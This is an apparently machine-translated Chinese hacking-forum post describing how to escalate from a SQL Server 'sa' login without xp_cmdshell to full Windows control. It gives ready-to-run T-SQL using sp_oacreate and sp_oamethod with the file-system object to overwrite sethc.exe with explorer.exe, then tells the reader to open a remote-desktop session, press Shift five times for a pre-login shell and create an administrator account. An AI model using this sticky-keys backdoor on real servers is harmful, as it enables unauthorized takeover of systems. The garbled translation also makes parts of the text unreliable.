No xp_cmdshell to mention the right-vulnerability warning-the black bar safety net

ID MYHACK58:62200925508
Type myhack58
Reporter 佚名
Modified 2009-12-06T00:00:00


Author: charley008 from: evil octal

With sa, but without xp_cmdshell, how to restore showing error. As is xxxx. cpp shucks error. Or cannot find the specified module, but I encountered so many times. With exec sp_oacreate 'wscript. shell'there is no way the case.. This method can be used Many servers are put'wscript. shell'to delete. See now that could use sp_oacreate and sp_oamethod to get'wscript. shell'or scripting. the filesystemobject See online articles are only a few usage's'wscript. shell'to execute commands or scripting. filesystemobject to write Trojans or read the file. So should you can also can copy, delete the file. The Internet looking for some information, to obtain the following method: Copy the files:

declare @o int exec sp_oacreate 'scripting. filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int exec sp_oacreate 'scripting. filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

After the success of the 3 3 8 9 log press five times the shift key. Successful entry into the server. All the way up point”my computer“right click“Management” User Management directly applied to the user. This method with no technology at all, hope for some people a little.